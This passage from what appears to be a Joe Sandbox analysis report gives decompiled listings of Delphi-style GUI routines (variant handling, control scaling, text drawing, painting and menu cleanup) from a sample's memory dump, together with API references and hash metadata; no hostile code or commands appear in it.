                                                    										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                                    										_pop(_t333);
                                                    										 *[fs:eax] = _t333;
                                                    										_push(0x416ae8);
                                                    										return E004109E8( &_v44);
                                                    									}
                                                    								}
                                                    							} else {
                                                    								E0041024C(__ecx);
                                                    								goto L46;
                                                    							}
                                                    						} else {
                                                    							_v13 = E00416328(_v12, 0);
                                                    							goto L46;
                                                    						}
                                                    					} else {
                                                    						_v13 = E00416314(1, 0);
                                                    						L46:
                                                    						return _v13;
                                                    					}
                                                    				}
                                                    			}

                                                    0x00416842
                                                    0x00416842
                                                    0x00416854
                                                    0x00416859
                                                    0x0041685c
                                                    0x0041685f
                                                    0x0041686c
                                                    0x00416762
                                                    0x00416769
                                                    0x00416808
                                                    0x00000000
                                                    0x0041676b
                                                    0x0041676e
                                                    0x0041676f
                                                    0x00416776
                                                    0x00416777
                                                    0x0041677c
                                                    0x0041677f
                                                    0x00416782
                                                    0x0041678b
                                                    0x0041679c
                                                    0x0041679e
                                                    0x0041679e
                                                    0x004167c6
                                                    0x004167cb
                                                    0x004167ce
                                                    0x004167d1
                                                    0x004167de
                                                    0x004167de
                                                    0x00416769
                                                    0x0041673d
                                                    0x0041673d
                                                    0x00000000
                                                    0x0041673d
                                                    0x00416717
                                                    0x00416723
                                                    0x00000000
                                                    0x00416723
                                                    0x00416700
                                                    0x00416709
                                                    0x00416ae8
                                                    0x00416af0
                                                    0x00416af0
                                                    0x004166fe

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 52380f3934db917eae4a074d51a237f82e83a3ba5d3f730a33236230b57d628b
                                                    • Instruction ID: 126fbda12782d38e062267a272fec00c664f0fd244103826fb372783f4e2cac9
                                                    • Opcode Fuzzy Hash: 52380f3934db917eae4a074d51a237f82e83a3ba5d3f730a33236230b57d628b
                                                    • Instruction Fuzzy Hash: A0D18339A00149AFCF00EF94C4819EEBBB5EF49314F5544AAE840B7355D638EEC6CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			E00415454(signed short* __eax, intOrPtr __ecx, signed short* __edx, void* __edi, void* __fp0) {
                                                    				signed short* _v8;
                                                    				signed short* _v12;
                                                    				intOrPtr _v16;
                                                    				signed int _v18;
                                                    				signed int _v20;
                                                    				void* _v24;
                                                    				void* _v28;
                                                    				char _v44;
                                                    				void* __ebp;
                                                    				void* _t119;
                                                    				signed int _t207;
                                                    				intOrPtr _t216;
                                                    				intOrPtr _t217;
                                                    				intOrPtr _t250;
                                                    				intOrPtr _t255;
                                                    				intOrPtr _t259;
                                                    				intOrPtr _t264;
                                                    				intOrPtr _t268;
                                                    				void* _t271;
                                                    				void* _t273;
                                                    				intOrPtr _t274;
                                                    
                                                    				_t278 = __fp0;
                                                    				_t269 = __edi;
                                                    				_t271 = _t273;
                                                    				_t274 = _t273 + 0xffffffd8;
                                                    				_v16 = __ecx;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				_t204 =  *_v8;
                                                    				if(( *_v8 & 0x00000fff) >= 0x10f) {
                                                    					if(E0041713C(_t204,  &_v24) == 0) {
                                                    						E0041024C(__ecx);
                                                    					}
                                                    					_push( &_v20);
                                                    					_t216 = _v16;
                                                    					if( *((intOrPtr*)( *_v24 + 8))() == 0) {
                                                    						_t207 =  *_v12;
                                                    						if((_t207 & 0x00000fff) >= 0x10f) {
                                                    							if(E0041713C(_t207,  &_v28) != 0) {
                                                    								_push( &_v18);
                                                    								_t217 = _v16;
                                                    								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
                                                    									_t119 = E0041024C(_t217);
                                                    									goto L40;
                                                    								} else {
                                                    									if( *_v8 == _v18) {
                                                    										_t119 =  *((intOrPtr*)( *_v28 + 0x2c))(_v16);
                                                    										goto L40;
                                                    									} else {
                                                    										_push( &_v44);
                                                    										L0040F318();
                                                    										_push(_t271);
                                                    										_push(0x415779);
                                                    										_push( *[fs:eax]);
                                                    										 *[fs:eax] = _t274;
                                                    										_t219 = _v18 & 0x0000ffff;
                                                    										E00411330( &_v44, _v18 & 0x0000ffff, _v8, _t269, _t278);
                                                    										E00410E14(_v8,  &_v44);
                                                    										if( *_v8 != _v18) {
                                                    											E0041015C(_t219);
                                                    										}
                                                    										_pop(_t250);
                                                    										 *[fs:eax] = _t250;
                                                    										_push(0x415780);
                                                    										return E004109E8( &_v44);
                                                    									}
                                                    								}
                                                    							} else {
                                                    								_t119 = E0041024C(_t216);
                                                    								goto L40;
                                                    							}
                                                    						} else {
                                                    							if(_t207 ==  *_v8) {
                                                    								_t119 = E004161B0(_v8, _v16, _v12, _t278);
                                                    								goto L40;
                                                    							} else {
                                                    								_push( &_v44);
                                                    								L0040F318();
                                                    								_push(_t271);
                                                    								_push(0x4156ca);
                                                    								_push( *[fs:eax]);
                                                    								 *[fs:eax] = _t274;
                                                    								_t224 =  *_v12 & 0x0000ffff;
                                                    								E00411330( &_v44,  *_v12 & 0x0000ffff, _v8, _t269, _t278);
                                                    								E00410E14(_v8,  &_v44);
                                                    								if( *_v8 !=  *_v12) {
                                                    									E0041015C(_t224);
                                                    								}
                                                    								_pop(_t255);
                                                    								 *[fs:eax] = _t255;
                                                    								_push(0x4156d1);
                                                    								return E004109E8( &_v44);
                                                    							}
                                                    						}
                                                    					} else {
                                                    						if( *_v12 == _v20) {
                                                    							_t119 =  *((intOrPtr*)( *_v24 + 0x2c))(_v16);
                                                    							goto L40;
                                                    						} else {
                                                    							_push( &_v44);
                                                    							L0040F318();
                                                    							_push(_t271);
                                                    							_push(0x41562f);
                                                    							_push( *[fs:eax]);
                                                    							 *[fs:eax] = _t274;
                                                    							_t228 = _v20 & 0x0000ffff;
                                                    							E00411330( &_v44, _v20 & 0x0000ffff, _v12, _t269, _t278);
                                                    							if(_v44 != _v20) {
                                                    								E0041015C(_t228);
                                                    							}
                                                    							 *((intOrPtr*)( *_v24 + 0x2c))(_v16);
                                                    							_pop(_t259);
                                                    							 *[fs:eax] = _t259;
                                                    							_push(0x415799);
                                                    							return E004109E8( &_v44);
                                                    						}
                                                    					}
                                                    				} else {
                                                    					if(E0041713C( *_v12,  &_v28) != 0) {
                                                    						_push( &_v18);
                                                    						if( *((intOrPtr*)( *_v28 + 4))() == 0) {
                                                    							_push( &_v44);
                                                    							L0040F318();
                                                    							_push(_t271);
                                                    							_push(0x41558f);
                                                    							_push( *[fs:eax]);
                                                    							 *[fs:eax] = _t274;
                                                    							_t234 =  *_v8 & 0x0000ffff;
                                                    							E00411330( &_v44,  *_v8 & 0x0000ffff, _v12, __edi, __fp0);
                                                    							if( *_v8 != _v44) {
                                                    								E0041015C(_t234);
                                                    							}
                                                    							E004161B0(_v8, _v16,  &_v44, _t278);
                                                    							_pop(_t264);
                                                    							 *[fs:eax] = _t264;
                                                    							_push(0x415799);
                                                    							return E004109E8( &_v44);
                                                    						} else {
                                                    							if( *_v8 == _v18) {
                                                    								_t119 =  *((intOrPtr*)( *_v28 + 0x2c))(_v16);
                                                    								goto L40;
                                                    							} else {
                                                    								_push( &_v44);
                                                    								L0040F318();
                                                    								_push(_t271);
                                                    								_push(0x415514);
                                                    								_push( *[fs:eax]);
                                                    								 *[fs:eax] = _t274;
                                                    								_t239 = _v18 & 0x0000ffff;
                                                    								E00411330( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
                                                    								E00410E14(_v8,  &_v44);
                                                    								if( *_v8 != _v18) {
                                                    									E0041015C(_t239);
                                                    								}
                                                    								_pop(_t268);
                                                    								 *[fs:eax] = _t268;
                                                    								_push(0x41551b);
                                                    								return E004109E8( &_v44);
                                                    							}
                                                    						}
                                                    					} else {
                                                    						_t119 = E0041024C(__ecx);
                                                    						L40:
                                                    						return _t119;
                                                    					}
                                                    				}
                                                    			}

                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 004154C0
                                                    • VariantInit.OLEAUT32(?), ref: 004155D6
                                                      • Part of subcall function 0041713C: RtlEnterCriticalSection.KERNEL32(0049E828,?,?,?,00000000,?,00416D60,00000000,00416E06,?,?,?,?,?,004101DF,00000000), ref: 00417172
                                                      • Part of subcall function 0041713C: RtlLeaveCriticalSection.KERNEL32(0049E828,004171EB,?,0049E828,?,?,?,00000000,?,00416D60,00000000,00416E06), ref: 004171DE
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalInitSectionVariant$EnterLeave
                                                    • String ID:
                                                    • API String ID: 2777075435-0
                                                    • Opcode ID: 911dfcfbc7a12d5b52f32f0e07c108f6710307d6a7d9ba3bae60d823c04f13e4
                                                    • Instruction ID: a24615229599b446cf83ad5ef8fc14772df329521493faa61475ffe7701a7f51
                                                    • Opcode Fuzzy Hash: 911dfcfbc7a12d5b52f32f0e07c108f6710307d6a7d9ba3bae60d823c04f13e4
                                                    • Instruction Fuzzy Hash: D8B16D79A00609EFDB00EF94C5818EDB7B5FF89714F9040A6E804A7751D738AEC5CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 87%
                                                    			E004534EC(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                    				intOrPtr _v8;
                                                    				signed char _t92;
                                                    				int _t98;
                                                    				int _t100;
                                                    				intOrPtr _t117;
                                                    				int _t122;
                                                    				intOrPtr _t155;
                                                    				void* _t164;
                                                    				signed char _t180;
                                                    				intOrPtr _t182;
                                                    				intOrPtr _t194;
                                                    				int _t199;
                                                    				intOrPtr _t203;
                                                    				void* _t204;
                                                    
                                                    				_t204 = __eflags;
                                                    				_t196 = __edi;
                                                    				_t202 = _t203;
                                                    				_push(__ecx);
                                                    				_v8 = __eax;
                                                    				L0043DF9C(_v8);
                                                    				_push(_t203);
                                                    				_push(0x453742);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t203;
                                                    				 *(_v8 + 0x268) = 0;
                                                    				 *(_v8 + 0x26c) = 0;
                                                    				 *(_v8 + 0x270) = 0;
                                                    				_t164 = 0;
                                                    				_t92 =  *0x49e665; // 0x0
                                                    				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
                                                    				E0043D6F8(_v8, 0, __ecx, __edx, _t204);
                                                    				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
                                                    					L12:
                                                    					_t98 =  *(_v8 + 0x268);
                                                    					_t213 = _t98;
                                                    					if(_t98 > 0) {
                                                    						E0043A998(_v8, _t98, _t196, _t213);
                                                    					}
                                                    					_t100 =  *(_v8 + 0x26c);
                                                    					_t214 = _t100;
                                                    					if(_t100 > 0) {
                                                    						E0043A9DC(_v8, _t100, _t196, _t214);
                                                    					}
                                                    					_t180 =  *0x453750; // 0x0
                                                    					 *(_v8 + 0x98) = _t180;
                                                    					_t215 = _t164;
                                                    					if(_t164 == 0) {
                                                    						E00452B4C(_v8, 1, 1);
                                                    						E004411C8(_v8, 1, 1, _t215);
                                                    					}
                                                    					E0043C130(_v8, 0, 0xb03d, 0);
                                                    					_pop(_t182);
                                                    					 *[fs:eax] = _t182;
                                                    					_push(0x453749);
                                                    					return L0043DFA4(_v8);
                                                    				} else {
                                                    					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
                                                    						_t194 =  *0x49ebbc; // 0x0
                                                    						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
                                                    							_t155 =  *0x49ebbc; // 0x0
                                                    							E00424FF8( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00424FF0( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
                                                    						}
                                                    					}
                                                    					_t117 =  *0x49ebbc; // 0x0
                                                    					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
                                                    					_t199 = E00453874(_v8);
                                                    					_t122 =  *(_v8 + 0x270);
                                                    					_t209 = _t199 - _t122;
                                                    					if(_t199 != _t122) {
                                                    						_t164 = 1;
                                                    						E00452B4C(_v8, _t122, _t199);
                                                    						E004411C8(_v8,  *(_v8 + 0x270), _t199, _t209);
                                                    						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
                                                    							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
                                                    						}
                                                    						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
                                                    							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
                                                    						}
                                                    						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
                                                    							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
                                                    							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
                                                    						}
                                                    					}
                                                    					goto L12;
                                                    				}
                                                    			}

                                                    Address column for the listing above (one entry per decompiled statement, in listing order): 0x004534ec, 0x004534ec, 0x004534ed, 0x004534ef, 0x004534f4, 0x004534fa, 0x00453501, 0x00453502, 0x00453507, 0x0045350a, 0x00453512, 0x0045351d, 0x00453528, 0x0045352e, 0x00453530, 0x0045353a, 0x00453545, 0x00453554, 0x004536b6, 0x004536b9, 0x004536bf, 0x004536c1, 0x004536c8, 0x004536c8, 0x004536d0, 0x004536d6, 0x004536d8, 0x004536df, 0x004536df, 0x004536e7, 0x004536ed, 0x004536f3, 0x004536f5, 0x00453704, 0x00453716, 0x00453716, 0x00453727, 0x0045372e, 0x00453731, 0x00453734, 0x00453741, 0x0045356a, 0x00453574, 0x0045357f, 0x00453588, 0x00453594, 0x004535b4, 0x004535b4, 0x00453588, 0x004535b9, 0x004535c4, 0x004535d2, 0x004535d7, 0x004535dd, 0x004535df, 0x004535e5, 0x004535ee, 0x00453601, 0x00453610, 0x0045362f, 0x0045362f, 0x0045363f, 0x0045365e, 0x0045365e, 0x0045366e, 0x0045368d, 0x004536b0, 0x004536b0, 0x0045366e, 0x00000000, 0x004535df

                                                    APIs
                                                    • MulDiv.KERNEL32(00000000,?,00000000), ref: 004535AB
                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453627
                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453656
                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453685
                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 004536A8
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf453c4939c3507c7547244688a5841333b77e73213c39d2921ddabae2898744
                                                    • Instruction ID: c7ec2d223f710dc91b05457c805857c5415938e4303d673742531becb7789678
                                                    • Opcode Fuzzy Hash: bf453c4939c3507c7547244688a5841333b77e73213c39d2921ddabae2898744
                                                    • Instruction Fuzzy Hash: 9171F670A04104EFCB04DFA9C589EADB3F5AF48305F2941FAE808DB362D775AE459B44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 85%
                                                    			E0044AF00(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				void* _v16;
                                                    				struct tagRECT _v32;
                                                    				void* _t53;
                                                    				int _t63;
                                                    				CHAR* _t65;
                                                    				void* _t76;
                                                    				void* _t78;
                                                    				int _t89;
                                                    				CHAR* _t91;
                                                    				int _t117;
                                                    				intOrPtr _t127;
                                                    				void* _t139;
                                                    				void* _t144;
                                                    				char _t153;
                                                    
                                                    				_t120 = __ecx;
                                                    				_t143 = _t144;
                                                    				_v16 = 0;
                                                    				_v12 = __ecx;
                                                    				_v8 = __edx;
                                                    				_t139 = __eax;
                                                    				_t117 = _a4;
                                                    				_push(_t144);
                                                    				_push(0x44b0e4);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t144 + 0xffffffe4;
                                                    				_t53 = E0044CE98(__eax);
                                                    				_t135 = _t53;
                                                    				if(_t53 != 0 && E0044E4D4(_t135) != 0) {
                                                    					if((_t117 & 0x00000000) != 0) {
                                                    						__eflags = (_t117 & 0x00000002) - 2;
                                                    						if((_t117 & 0x00000002) == 2) {
                                                    							_t117 = _t117 & 0xfffffffd;
                                                    							__eflags = _t117;
                                                    						}
                                                    					} else {
                                                    						_t117 = _t117 & 0xffffffff | 0x00000002;
                                                    					}
                                                    					_t117 = _t117 | 0x00020000;
                                                    				}
                                                    				E00404A58( &_v16, _v12);
                                                    				if((_t117 & 0x00000004) == 0) {
                                                    					L12:
                                                    					E00404DCC(_v16, 0x44b108);
                                                    					if(_t153 != 0) {
                                                    						E004256F8( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
                                                    						__eflags =  *((char*)(_t139 + 0x3a));
                                                    						if( *((char*)(_t139 + 0x3a)) != 0) {
                                                    							_t136 =  *((intOrPtr*)(_v8 + 0xc));
                                                    							__eflags = E004250D0( *((intOrPtr*)(_v8 + 0xc))) |  *0x44b10c;
                                                    							E004250DC( *((intOrPtr*)(_v8 + 0xc)), E004250D0( *((intOrPtr*)(_v8 + 0xc))) |  *0x44b10c, _t136, _t139, _t143);
                                                    						}
                                                    						__eflags =  *((char*)(_t139 + 0x39));
                                                    						if( *((char*)(_t139 + 0x39)) != 0) {
                                                    							L24:
                                                    							_t63 = E00404C80(_v16);
                                                    							_t65 = E00404E80(_v16);
                                                    							DrawTextA(L00425C68(_v8), _t65, _t63, _a12, _t117);
                                                    							L25:
                                                    							_pop(_t127);
                                                    							 *[fs:eax] = _t127;
                                                    							_push(0x44b0eb);
                                                    							return E004049C0( &_v16);
                                                    						} else {
                                                    							__eflags = _a8;
                                                    							if(_a8 == 0) {
                                                    								OffsetRect(_a12, 1, 1);
                                                    								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
                                                    								_t89 = E00404C80(_v16);
                                                    								_t91 = E00404E80(_v16);
                                                    								DrawTextA(L00425C68(_v8), _t91, _t89, _a12, _t117);
                                                    								OffsetRect(_a12, 0xffffffff, 0xffffffff);
                                                    							}
                                                    							__eflags = _a8;
                                                    							if(_a8 == 0) {
                                                    								L23:
                                                    								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
                                                    							} else {
                                                    								_t76 = E00424950(0xff00000d);
                                                    								_t78 = E00424950(0xff000010);
                                                    								__eflags = _t76 - _t78;
                                                    								if(_t76 != _t78) {
                                                    									goto L23;
                                                    								}
                                                    								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
                                                    							}
                                                    							goto L24;
                                                    						}
                                                    					}
                                                    					if((_t117 & 0x00000004) == 0) {
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						_v32.top = _v32.top + 4;
                                                    						DrawEdge(L00425C68(_v8),  &_v32, 6, 2);
                                                    					}
                                                    					goto L25;
                                                    				} else {
                                                    					if(_v16 == 0) {
                                                    						L11:
                                                    						E00404C88( &_v16, 0x44b0fc);
                                                    						goto L12;
                                                    					}
                                                    					if( *_v16 != 0x26) {
                                                    						goto L12;
                                                    					}
                                                    					_t153 =  *((char*)(_v16 + 1));
                                                    					if(_t153 != 0) {
                                                    						goto L12;
                                                    					}
                                                    					goto L11;
                                                    				}
                                                    			}

                                                    Address column for the listing above (one entry per decompiled statement, in listing order): 0x0044af00, 0x0044af01, 0x0044af0b, 0x0044af0e, 0x0044af11, 0x0044af14, 0x0044af16, 0x0044af1b, 0x0044af1c, 0x0044af21, 0x0044af24, 0x0044af29, 0x0044af2e, 0x0044af32, 0x0044af42, 0x0044af51, 0x0044af54, 0x0044af59, 0x0044af59, 0x0044af59, 0x0044af44, 0x0044af47, 0x0044af47, 0x0044af5c, 0x0044af5c, 0x0044af68, 0x0044af70, 0x0044af96, 0x0044af9e, 0x0044afa3, 0x0044afe1, 0x0044afe6, 0x0044afea, 0x0044afef, 0x0044affb, 0x0044b003, 0x0044b003, 0x0044b008, 0x0044b00c, 0x0044b0a9, 0x0044b0b1, 0x0044b0ba, 0x0044b0c9, 0x0044b0ce, 0x0044b0d0, 0x0044b0d3, 0x0044b0d6, 0x0044b0e3, 0x0044b012, 0x0044b012, 0x0044b016, 0x0044b020, 0x0044b030, 0x0044b03d, 0x0044b046, 0x0044b055, 0x0044b062, 0x0044b062, 0x0044b067, 0x0044b06b, 0x0044b099, 0x0044b0a4, 0x0044b06d, 0x0044b072, 0x0044b07e, 0x0044b083, 0x0044b085, 0x00000000, 0x00000000, 0x0044b092, 0x0044b092, 0x00000000, 0x0044b06b, 0x0044b00c, 0x0044afa8, 0x0044afb6, 0x0044afb7, 0x0044afb8, 0x0044afb9, 0x0044afba, 0x0044afcf, 0x0044afcf, 0x00000000, 0x0044af72, 0x0044af76, 0x0044af89, 0x0044af91, 0x00000000, 0x0044af91, 0x0044af7e, 0x00000000, 0x00000000, 0x0044af83, 0x0044af87, 0x00000000, 0x00000000, 0x00000000, 0x0044af87

                                                    APIs
                                                    • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 0044AFCF
                                                    • OffsetRect.USER32(?,00000001,00000001), ref: 0044B020
                                                    • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044B055
                                                    • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044B062
                                                    • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044B0C9
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Draw$OffsetRectText$Edge
                                                    • String ID:
                                                    • API String ID: 3610532707-0
                                                    • Opcode ID: 18493c12ef401e963272a7311625c849f2c9f643628862a87cd9f04e99074c40
                                                    • Instruction ID: ea5abe3bfc9a9df89051e6d8e73c4225462b89b626b3e2b5561302bed16b813c
                                                    • Opcode Fuzzy Hash: 18493c12ef401e963272a7311625c849f2c9f643628862a87cd9f04e99074c40
                                                    • Instruction Fuzzy Hash: C551A3B0A04204AFEB10EBA9D881B9F73E5EF44324F55856BF924A7381C73CED048B59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 85%
                                                    			E0043F3B8(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                    				intOrPtr* _v8;
                                                    				intOrPtr _v12;
                                                    				int _v16;
                                                    				int _v20;
                                                    				struct tagPAINTSTRUCT _v84;
                                                    				intOrPtr _t55;
                                                    				void* _t64;
                                                    				struct HDC__* _t75;
                                                    				intOrPtr _t84;
                                                    				void* _t95;
                                                    				void* _t96;
                                                    				void* _t98;
                                                    				void* _t100;
                                                    				void* _t101;
                                                    				intOrPtr _t102;
                                                    
                                                    				_t100 = _t101;
                                                    				_t102 = _t101 + 0xffffffb0;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				_t75 =  *(_v12 + 4);
                                                    				if(_t75 == 0) {
                                                    					_t75 = BeginPaint(E00441704(_v8),  &_v84);
                                                    				}
                                                    				_push(_t100);
                                                    				_push(0x43f4d8);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t102;
                                                    				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
                                                    					_v20 = SaveDC(_t75);
                                                    					_v16 = 2;
                                                    					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
                                                    					if(_t95 >= 0) {
                                                    						_t96 = _t95 + 1;
                                                    						_t98 = 0;
                                                    						do {
                                                    							_t64 = E0041AC6C( *((intOrPtr*)(_v8 + 0x198)), _t98);
                                                    							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
                                                    								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
                                                    									goto L11;
                                                    								} else {
                                                    									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
                                                    									if(_v16 != 1) {
                                                    										goto L11;
                                                    									}
                                                    								}
                                                    							} else {
                                                    								goto L11;
                                                    							}
                                                    							goto L12;
                                                    							L11:
                                                    							_t98 = _t98 + 1;
                                                    							_t96 = _t96 - 1;
                                                    						} while (_t96 != 0);
                                                    					}
                                                    					L12:
                                                    					if(_v16 != 1) {
                                                    						 *((intOrPtr*)( *_v8 + 0xb8))();
                                                    					}
                                                    					RestoreDC(_t75, _v20);
                                                    				} else {
                                                    					 *((intOrPtr*)( *_v8 + 0xb8))();
                                                    				}
                                                    				E0043F510(_v8, 0, _t75);
                                                    				_pop(_t84);
                                                    				 *[fs:eax] = _t84;
                                                    				_push(0x43f4df);
                                                    				_t55 = _v12;
                                                    				if( *((intOrPtr*)(_t55 + 4)) == 0) {
                                                    					return EndPaint(E00441704(_v8),  &_v84);
                                                    				}
                                                    				return _t55;
			}

                                                    APIs
                                                    • BeginPaint.USER32(00000000,?), ref: 0043F3DE
                                                    • SaveDC.GDI32(?), ref: 0043F412
                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0043F474
                                                    • RestoreDC.GDI32(?,?), ref: 0043F49E
                                                    • EndPaint.USER32(00000000,?,0043F4DF), ref: 0043F4D2
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                    • String ID:
                                                    • API String ID: 3808407030-0
                                                    • Opcode ID: d4ea672e3d9b3f4c2e1dab9854368b7484ecc5b1cbb8fc2f2094f499677641b8
                                                    • Instruction ID: 9443a4bcddcea103c83dcf0c2b69b8a33cb36b1669e9c3c4d5886d405921b8f2
                                                    • Opcode Fuzzy Hash: d4ea672e3d9b3f4c2e1dab9854368b7484ecc5b1cbb8fc2f2094f499677641b8
                                                    • Instruction Fuzzy Hash: DA415070E00208AFC700DB99C984EAFB7F9AF58318F5490BAE90497362D739AE45CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0044AD40(int __eax, void* __edx) {
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t39;
                                                    				signed int _t40;
                                                    				intOrPtr _t44;
                                                    				int _t45;
                                                    				void* _t47;
                                                    				int _t48;
                                                    				intOrPtr* _t49;
                                                    
                                                    				_t18 = __eax;
                                                    				_t49 = __eax;
                                                    				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
                                                    					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
                                                    						 *((char*)(__eax + 0x74)) = 1;
                                                    						return __eax;
                                                    					}
                                                    					_t19 =  *((intOrPtr*)(__eax + 0x6c));
                                                    					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
                                                    						return E0044AD40(_t19, __edx);
                                                    					}
                                                    					_t18 = GetMenuItemCount(E0044AE70(__eax, _t45, _t47));
                                                    					_t48 = _t18;
                                                    					_t40 = _t39 & 0xffffff00 | _t48 == 0x00000000;
                                                    					while(_t48 > 0) {
                                                    						_t45 = _t48 - 1;
                                                    						_t18 = GetMenuState(E0044AE70(_t49, _t45, _t48), _t45, 0x400);
                                                    						if((_t18 & 0x00000004) == 0) {
                                                    							_t18 = RemoveMenu(E0044AE70(_t49, _t45, _t48), _t45, 0x400);
                                                    							_t40 = 1;
                                                    						}
                                                    						_t48 = _t48 - 1;
                                                    					}
                                                    					if(_t40 != 0) {
                                                    						if( *((intOrPtr*)(_t49 + 0x64)) != 0) {
                                                    							L14:
                                                    							E0044AC00(_t49, _t45, _t48);
                                                    							L15:
                                                    							return  *((intOrPtr*)( *_t49 + 0x3c))();
                                                    						}
                                                    						_t44 =  *0x449854; // 0x4498a0
                                                    						if(L00403D78( *((intOrPtr*)(_t49 + 0x70)), _t44) == 0 || GetMenuItemCount(E0044AE70(_t49, _t45, _t48)) != 0) {
                                                    							goto L14;
                                                    						} else {
                                                    							DestroyMenu( *(_t49 + 0x34));
                                                    							 *(_t49 + 0x34) = 0;
                                                    							goto L15;
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t18;
			}

                                                    Memory Dump Source
